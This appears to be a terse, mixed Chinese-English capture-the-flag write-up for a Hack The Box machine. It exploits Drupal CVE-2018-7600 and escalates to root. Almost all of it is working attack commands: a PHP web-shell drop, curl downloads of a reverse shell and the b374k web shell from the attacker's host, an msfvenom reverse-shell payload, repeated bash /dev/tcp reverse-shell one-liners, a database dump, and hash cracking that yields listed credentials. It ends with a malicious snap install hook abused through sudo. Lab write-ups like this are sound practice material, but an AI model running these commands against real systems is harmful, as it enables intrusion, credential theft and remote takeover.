• URL : https://app.hackthebox.eu/machines/323
• IP : 10.129.216.90

Recon

• nmapAutomator.sh -H 10.129.216.90 -t recon
  • 80
  • 22
• 

Exploit

https://github.com/pimps/CVE-2018-7600

Webshell

• python3 drupa7-CVE-2018-7600.py http://10.129.216.90/ -c "echo '<?php system(\$_GET[A]);' > s.php "
• 
• 確認電腦裡有 curl
  • 
• 下載 reverse shell
  • curl http://10.10.16.35/s_HTB -o s
  • 但發現戳不回來
• 傳 b374k
  • http://10.129.216.90/s.php?A=curl%20http://10.10.16.35/b374k.php%20-o%20s.php
  • 戳 reverse shell
    • 
    • 發現權限不足
• Try msf shell
  • msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f elf > shell1
  • 
• 給權限
  • 
  • 還是沒權限
• 試試看如果連 80 port
  • bash -c 'bash -i >& /dev/tcp/10.10.16.35/80 0>&1'
  • 成功

提權

• 收 Reverse shell
  • 
• 載豌豆
  • 
• 發現一些密碼
  • 
  • 
  • drupal-6.user-password-token.database.php
  • 
• spawn
  • perl -e 'exec "/bin/bash";'
• dump mysql
  • mysqldump -u drupaluser -h localhost -p drupal > a.sql
• 找到一組 hash
  • 
  • 
• 確認使用者名稱
  • 
• 爆破 hash
  • hashcat -m 7900 hash.txt /opt/rockyou.txt
  • 
• 取得帳密
  • brucetherealadmin
  • booboo
• 切換使用者
  • 

提權

• 直接用 SSH 登入
  • 
  • 
  • 發現可以用 sudo snap
• 本地
  • gem install fpm
  • https://gtfobins.github.io/gtfobins/snap/#sudo
• 照做提權
  • 
  • 

COMMAND="bash -c 'bash -i >& /dev/tcp/10.10.16.35/80 0>&1'"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

• 傳上去
  • 
• 收 Reverse shell
  • 
• 取得 Root
  •